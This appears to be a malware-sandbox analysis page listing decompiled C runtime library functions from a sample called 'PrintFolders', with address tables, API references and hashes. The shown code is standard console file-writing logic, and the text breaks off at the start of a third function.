Opcode ID: 2276f604c3605784d6e405f8d7a2a755b298f9d58d573019e86a6d79aba38d61
Instruction ID: 5758688b685aa4187ad7d7f5b15dace94247948c6bb2fc7bee6470d4da2af1b6
Opcode Fuzzy Hash: 2276f604c3605784d6e405f8d7a2a755b298f9d58d573019e86a6d79aba38d61
Instruction Fuzzy Hash: FB11E4B16003045BC714DF59D802B96B3E8AF84310F10D53FFA55ABA81E778E854CB59

Uniqueness

Uniqueness Score: -1.00%

Function 1000C0D4 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E1000C0D4(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x10017004; // 0x79eab102
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x10018110 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E100065BE( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x10018110 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x10017750; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x10018110 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E1000B82D( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x10017750)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x10018110 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E10005BC0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x10018110 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E1000B82D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E1000A4B8(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E1000AE12(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x10018110 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x10018110 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x10018110 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E100088CB( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E100088CB();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E100031FF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x1000c0df
0x1000c0e6
0x1000c0e9
0x1000c0f1
0x1000c0f4
0x1000c101
0x1000c104
0x1000c107
0x1000c10e
0x1000c116
0x1000c119
0x1000c11c
0x1000c122
0x1000c124
0x1000c12b
0x1000c135
0x1000c137
0x1000c13a
0x1000c13d
0x1000c140
0x1000c143
0x1000c146
0x1000c14c
0x1000c457
0x1000c457
0x00000000
0x1000c152
0x1000c15a
0x1000c15d
0x1000c163
0x1000c166
0x1000c16d
0x1000c174
0x1000c177
0x00000000
0x00000000
0x1000c180
0x1000c185
0x1000c187
0x1000c18a
0x1000c18f
0x1000c193
0x00000000
0x00000000
0x00000000
0x1000c193
0x1000c198
0x1000c19a
0x1000c19f
0x1000c259
0x1000c260
0x1000c261
0x1000c264
0x1000c266
0x1000c40a
0x1000c40c
0x00000000
0x1000c40e
0x1000c40e
0x1000c411
0x1000c420
0x1000c424
0x1000c425
0x1000c425
0x00000000
0x1000c429
0x1000c26c
0x1000c26e
0x1000c274
0x1000c277
0x1000c283
0x1000c28c
0x1000c297
0x1000c29c
0x1000c29f
0x1000c2a2
0x00000000
0x1000c2a8
0x1000c2a8
0x00000000
0x1000c2a8
0x1000c2a2
0x1000c1a5
0x1000c1b4
0x1000c1b5
0x1000c1b8
0x1000c1bb
0x1000c1c0
0x1000c3d6
0x1000c3d8
0x1000c3da
0x1000c3dc
0x1000c3e6
0x1000c3ee
0x1000c3f0
0x1000c3f1
0x1000c3f5
0x1000c3f8
0x1000c3f8
0x1000c3fc
0x1000c3fc
0x1000c3fc
0x1000c3ff
0x1000c3ff
0x1000c3ff
0x1000c401
0x1000c401
0x1000c405
0x1000c1c6
0x1000c1c6
0x1000c1c9
0x1000c1cb
0x1000c1ce
0x1000c1d1
0x1000c1d5
0x1000c1d6
0x1000c1da
0x1000c1dd
0x1000c1e2
0x1000c1ec
0x1000c1f1
0x1000c1f4
0x1000c1f7
0x1000c1f7
0x1000c1fa
0x1000c1fd
0x1000c1ff
0x1000c208
0x1000c20c
0x1000c20d
0x1000c211
0x1000c217
0x1000c220
0x1000c22d
0x1000c234
0x1000c238
0x1000c243
0x1000c248
0x1000c24e
0x00000000
0x1000c254
0x1000c2ab
0x1000c2ac
0x1000c32f
0x1000c336
0x1000c33e
0x1000c346
0x1000c34b
0x1000c34e
0x1000c353
0x00000000
0x1000c359
0x1000c36e
0x1000c44e
0x1000c454
0x00000000
0x1000c374
0x1000c37d
0x1000c37f
0x1000c385
0x00000000
0x1000c38b
0x1000c38f
0x1000c3c5
0x1000c3c8
0x00000000
0x1000c3ce
0x1000c3ce
0x00000000
0x1000c3ce
0x1000c391
0x1000c393
0x1000c395
0x1000c3ae
0x00000000
0x1000c3b4
0x1000c3b8
0x00000000
0x1000c3be
0x1000c3be
0x1000c3c1
0x1000c3c2
0x00000000
0x1000c3c2
0x1000c3b8
0x1000c3ae
0x1000c38f
0x1000c385
0x1000c36e
0x1000c353
0x1000c24e
0x1000c1c0
0x00000000
0x1000c2b0
0x1000c2b0
0x1000c2b4
0x1000c2b7
0x1000c2d9
0x1000c2dc
0x1000c2e1
0x1000c2e5
0x1000c2e9
0x1000c317
0x1000c319
0x00000000
0x1000c2eb
0x1000c2eb
0x1000c2eb
0x1000c2ee
0x1000c2f1
0x1000c2f4
0x1000c42b
0x1000c42e
0x1000c431
0x1000c43b
0x1000c446
0x1000c44b
0x00000000
0x1000c2fa
0x1000c301
0x1000c306
0x1000c309
0x1000c30c
0x00000000
0x1000c312
0x1000c312
0x00000000
0x1000c312
0x1000c30c
0x1000c2f4
0x1000c2b9
0x1000c2bd
0x1000c2c0
0x1000c2c5
0x1000c2cb
0x1000c2cd
0x1000c2d4
0x1000c31a
0x1000c31d
0x1000c31e
0x1000c323
0x1000c326
0x1000c329
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c329
0x00000000
0x1000c2b7
0x1000c152
0x1000c45a
0x1000c45a
0x1000c45c
0x1000c45f
0x1000c45f
0x1000c45f
0x1000c45f
0x1000c471
0x1000c473
0x1000c474
0x1000c475
0x1000c47f

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000C11C
__fassign.LIBCMT ref: 1000C301
__fassign.LIBCMT ref: 1000C31E
WriteFile.KERNEL32(?,10008E0A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000C366
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000C3A6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000C44E

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 98efbe4c6ee7657adc3feaa6b2c886c835ef08a3cb57c6140dfa4e34a11008b6
Instruction ID: d8b638840345e1b49b0cc72bb3c582407c8398851cd7aadc47a9f3c0936b2730
Opcode Fuzzy Hash: 98efbe4c6ee7657adc3feaa6b2c886c835ef08a3cb57c6140dfa4e34a11008b6
Instruction Fuzzy Hash: E4C19E75D0025C9FEB11CFE8C8909EDBBB5FF08354F28816AE855B7246D631AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 004207BB Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E004207BB(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x43d054; // 0x7bd02ead
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E00413621( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x4508e0 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x43d298; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x4508e0 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E0041FF30( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x43d298)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x4508e0 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E004104C0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x4508e0 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E0041FF30( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E00420094(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E00418EB4(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E0041EEBF( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E0041EEBF();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E0040EBBF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x004207c6
0x004207cd
0x004207d0
0x004207d8
0x004207db
0x004207e8
0x004207eb
0x004207ee
0x004207f5
0x004207fd
0x00420800
0x00420803
0x00420809
0x0042080b
0x00420812
0x0042081c
0x0042081e
0x00420821
0x00420824
0x00420827
0x0042082a
0x0042082d
0x00420833
0x00420b3e
0x00420b3e
0x00000000
0x00420839
0x00420841
0x00420844
0x0042084a
0x0042084d
0x00420854
0x0042085b
0x0042085e
0x00000000
0x00000000
0x00420867
0x0042086c
0x0042086e
0x00420871
0x00420876
0x0042087a
0x00000000
0x00000000
0x00000000
0x0042087a
0x0042087f
0x00420881
0x00420886
0x00420940
0x00420947
0x00420948
0x0042094b
0x0042094d
0x00420af1
0x00420af3
0x00000000
0x00420af5
0x00420af5
0x00420af8
0x00420b07
0x00420b0b
0x00420b0c
0x00420b0c
0x00000000
0x00420b10
0x00420953
0x00420955
0x0042095b
0x0042095e
0x0042096a
0x00420973
0x0042097e
0x00420983
0x00420986
0x00420989
0x00000000
0x0042098f
0x0042098f
0x00000000
0x0042098f
0x00420989
0x0042088c
0x0042089b
0x0042089c
0x0042089f
0x004208a2
0x004208a7
0x00420abd
0x00420abf
0x00420ac1
0x00420ac3
0x00420acd
0x00420ad5
0x00420ad7
0x00420ad8
0x00420adc
0x00420adf
0x00420adf
0x00420ae3
0x00420ae3
0x00420ae3
0x00420ae6
0x00420ae6
0x00420ae6
0x00420ae8
0x00420ae8
0x00420aec
0x004208ad
0x004208ad
0x004208b0
0x004208b2
0x004208b5
0x004208b8
0x004208bc
0x004208bd
0x004208c1
0x004208c4
0x004208c9
0x004208d3
0x004208d8
0x004208db
0x004208de
0x004208de
0x004208e1
0x004208e4
0x004208e6
0x004208ef
0x004208f3
0x004208f4
0x004208f8
0x004208fe
0x00420907
0x00420914
0x0042091b
0x0042091f
0x0042092a
0x0042092f
0x00420935
0x00000000
0x0042093b
0x00420992
0x00420993
0x00420a16
0x00420a1d
0x00420a25
0x00420a2d
0x00420a32
0x00420a35
0x00420a3a
0x00000000
0x00420a40
0x00420a55
0x00420b35
0x00420b3b
0x00000000
0x00420a5b
0x00420a64
0x00420a66
0x00420a6c
0x00000000
0x00420a72
0x00420a76
0x00420aac
0x00420aaf
0x00000000
0x00420ab5
0x00420ab5
0x00000000
0x00420ab5
0x00420a78
0x00420a7a
0x00420a7c
0x00420a95
0x00000000
0x00420a9b
0x00420a9f
0x00000000
0x00420aa5
0x00420aa5
0x00420aa8
0x00420aa9
0x00000000
0x00420aa9
0x00420a9f
0x00420a95
0x00420a76
0x00420a6c
0x00420a55
0x00420a3a
0x00420935
0x004208a7
0x00000000
0x00420997
0x00420997
0x0042099b
0x0042099e
0x004209c0
0x004209c3
0x004209c8
0x004209cc
0x004209d0
0x004209fe
0x00420a00
0x00000000
0x004209d2
0x004209d2
0x004209d2
0x004209d5
0x004209d8
0x004209db
0x00420b12
0x00420b15
0x00420b18
0x00420b22
0x00420b2d
0x00420b32
0x00000000
0x004209e1
0x004209e8
0x004209ed
0x004209f0
0x004209f3
0x00000000
0x004209f9
0x004209f9
0x00000000
0x004209f9
0x004209f3
0x004209db
0x004209a0
0x004209a4
0x004209a7
0x004209ac
0x004209b2
0x004209b4
0x004209bb
0x00420a01
0x00420a04
0x00420a05
0x00420a0a
0x00420a0d
0x00420a10
0x00000000
0x00000000
0x00000000
0x00000000
0x00420a10
0x00000000
0x0042099e
0x00420839
0x00420b41
0x00420b41
0x00420b43
0x00420b46
0x00420b46
0x00420b46
0x00420b46
0x00420b58
0x00420b5a
0x00420b5b
0x00420b5c
0x00420b66

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420803
__fassign.LIBCMT ref: 004209E8
__fassign.LIBCMT ref: 00420A05
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00420A4D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00420A8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00420B35

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 45f1c1bc1b9525421630f80e21f96edc239ce45b7ad5b4f0668f9778ebca938e
Instruction ID: 5bda8817d63fbd95ec10d1615f909a3fa13ea14378ce0ba8d39ea156ef37e8f3
Opcode Fuzzy Hash: 45f1c1bc1b9525421630f80e21f96edc239ce45b7ad5b4f0668f9778ebca938e
Instruction Fuzzy Hash: 59C18E75E002688FCB14CFA9D9809EDFBF5AF18304F68416AE855B7342D635A942CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041F139 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041F139(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, char _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
